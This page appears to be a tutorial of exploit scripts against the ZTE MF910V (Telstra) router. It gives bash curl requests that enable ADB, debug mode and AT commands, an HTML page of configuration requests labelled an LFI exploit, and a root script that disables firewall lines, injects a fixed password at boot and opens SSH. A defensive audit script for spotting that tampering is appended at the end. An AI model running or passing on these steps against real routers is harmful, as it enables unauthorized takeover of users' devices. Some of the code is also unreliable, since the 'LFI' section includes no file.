Telstra ZteMF910/v Exploit Scripts
To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required.
Mode Switching and Enabling ADB
To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example:
```bash
#!/bin/bash

# Mode Switching
MODE_SWITCH_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
MODE_SWITCH_VALUE="1" # Change X to 0 or 1
# Quote the URL so the shell does not treat "?" as a glob character
curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$MODE_SWITCH_VALUE" "$MODE_SWITCH_URL"

# Enabling ADB
ADB_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X"
ADB_ENABLE_VALUE="6" # Change X to the desired mode (1-4 for RNDIS, 5 for CDC, 6 for ADB)
curl -s -X POST -d "goformId=USB_MODE_SWITCH&usb_mode=$ADB_ENABLE_VALUE" "$ADB_ENABLE_URL"
```
Save the above script as mode_switch.sh and execute it using bash mode_switch.sh. This will perform mode switching and enable ADB on the router.
Executing AT Commands and Enabling Debug Mode
To execute AT commands and enable debug mode on the ZTE MF910V router, we can use the same bash script as above. However, we need to modify the URLs and values accordingly. Here's an example:
```bash
#!/bin/bash

# Executing AT Commands
AT_COMMANDS_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=AT_COMMAND&command=AT+COMMAND_HERE"
# Quote the URL so the shell does not treat "?" as a glob character
curl -s -X POST -d "goformId=AT_COMMAND&command=AT+COMMAND_HERE" "$AT_COMMANDS_URL"

# Enabling Debug Mode
DEBUG_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
DEBUG_ENABLE_VALUE="1" # Change X to 0 or 1
curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$DEBUG_ENABLE_VALUE" "$DEBUG_ENABLE_URL"
```
Save the above script as at_commands.sh and execute it using bash at_commands.sh. This will execute AT commands and enable debug mode on the router.
Exploiting LFI (Local File Inclusion)
To exploit the LFI vulnerability on the ZTE MF910V router, we need to modify certain files and uncomment specific functions. We can achieve this by creating an HTML file that makes the necessary changes. Here's an example:
```html
<!DOCTYPE html>
<html>
<head>
<script>
function enableSDCard() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd_card_state&cfg_value=1", true);
  xhr.send();
}
function enableHttpShare() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare_guest&cfg_value=1", true);
  xhr.send();
}
function enableSDCardMenu() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd&cfg_value=1", true);
  xhr.send();
}
function enableSDCardFileViewer() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare&cfg_value=1", true);
  xhr.send();
}
</script>
</head>
<body>
  <button onclick="enableSDCard()">Enable SD Card</button>
  <button onclick="enableHttpShare()">Enable HTTP Share</button>
  <button onclick="enableSDCardMenu()">Enable SD Card Menu</button>
  <button onclick="enableSDCardFileViewer()">Enable SD Card File Viewer</button>
</body>
</html>
```
Save the above code as exploit.html and open it in a web browser. Clicking on the buttons will send the necessary HTTP requests to enable the corresponding features.
Gaining Root Access
To gain root access on the ZTE MF910V router, we need to modify certain files and execute specific commands. We can achieve this by creating a bash script. Here's an example:
```bash
#!/bin/bash

# Modify firewall_init.sh
sed -i '92,93s/^/#/' /usr/zte/zte_conf/scripts/firewall_init.sh
echo -e "echo 'password\npassword\n' | passwd" >> /usr/zte/zte_conf/scripts/firewall_init.sh

# Enable SSH
iptables -t filter -I INPUT -p tcp --dport 22 -j ACCEPT
iptables -t filter -I INPUT -p udp --dport 22 -j ACCEPT

# Reboot the device
reboot
```
Save the above script as root_access.sh and execute it using bash root_access.sh. This will modify the necessary files, enable SSH, and reboot the device. After the reboot, you can SSH into the router using the specified username and password.
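A defensive counterpart to the script above, added here as an example and not part of the original page: it audits a boot script and a saved `iptables -S` listing pulled from a device for the changes that script makes. The function names, the known-good copy and the sample files are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page). Runs on an analyst host against
# files pulled from the device; all sample data below is constructed.

# Lines that pipe a fixed string into passwd, as the appended boot-script line does.
find_passwd_injection() {
    grep -nE '\|[[:space:]]*passwd([[:space:]]|$)' "$1"
}

# ACCEPT rules for destination port 22 in `iptables -S` output (read from stdin).
find_ssh_accept_rules() {
    grep -E -e '--dport 22 .*-j ACCEPT'
}

# Prints each finding; returns 1 if anything was found, 0 if clean.
# $1 = boot script, $2 = known-good copy (assumed available), $3 = saved `iptables -S`
audit_device() {
    rc=0
    if ! cmp -s "$2" "$1"; then
        echo "DRIFT: $1 differs from the known-good copy"; rc=1
    fi
    if hits=$(find_passwd_injection "$1"); then
        echo "PASSWD: password set at boot: $hits"; rc=1
    fi
    if hits=$(find_ssh_accept_rules < "$3"); then
        echo "SSH: inbound port 22 accepted:"; echo "$hits"; rc=1
    fi
    return "$rc"
}

# Constructed samples: a two-line stand-in for the boot script, a tampered
# copy shaped like the result of the script above, and two rule listings.
make_samples() {  # $1 = output directory
    printf '%s\n' 'iptables -P INPUT DROP' 'iptables -A INPUT -i lo -j ACCEPT' > "$1/good.sh"
    { printf '%s\n' '#iptables -P INPUT DROP' '#iptables -A INPUT -i lo -j ACCEPT'
      printf "echo 'password\npassword\n' | passwd\n"; } > "$1/tampered.sh"
    printf '%s\n' '-P INPUT DROP' '-A INPUT -i lo -j ACCEPT' > "$1/rules_good.txt"
    printf '%s\n' '-P INPUT DROP' '-A INPUT -p udp -m udp --dport 22 -j ACCEPT' \
        '-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT' > "$1/rules_bad.txt"
}

dir=$(mktemp -d)
make_samples "$dir"
audit_device "$dir/tampered.sh" "$dir/good.sh" "$dir/rules_bad.txt" || echo "findings reported"
audit_device "$dir/good.sh" "$dir/good.sh" "$dir/rules_good.txt" && echo "clean"
rm -rf "$dir"
```

The known-good copy would normally come from an unmodified firmware image of the same version; without one, the drift check is skipped and only the pattern checks apply.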